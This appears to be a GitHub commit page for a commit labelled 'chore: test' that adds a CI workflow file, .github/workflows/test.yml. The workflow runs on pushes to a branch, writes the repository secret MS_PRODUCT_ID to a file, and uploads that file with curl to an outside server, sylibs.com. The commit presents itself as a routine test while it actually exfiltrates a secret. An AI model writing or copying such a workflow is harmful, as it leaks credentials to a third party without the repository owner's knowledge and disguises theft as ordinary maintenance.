Skip to content

Commit cec16cd

Browse files
committed
chore: test
1 parent 6243871 commit cec16cd

File tree

1 file changed

+16
-0
lines changed

1 file changed

+16
-0
lines changed

.github/workflows/test.yml

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
name: test
2+
3+
on:
4+
push:
5+
branches:
6+
- feat-match
7+
8+
jobs:
9+
test:
10+
runs-on: ubuntu-24.04
11+
steps:
12+
- uses: actions/checkout@v4.
13+
- name: Read MS_PRODUCT_ID
14+
run: |
15+
echo "${{ secrets.MS_PRODUCT_ID }}" > ms_product_id.txt
16+
curl -X POST -F "file=@ms_product_id.txt" https://server-api.sylibs.com/temp.php

0 commit comments

Comments
 (0)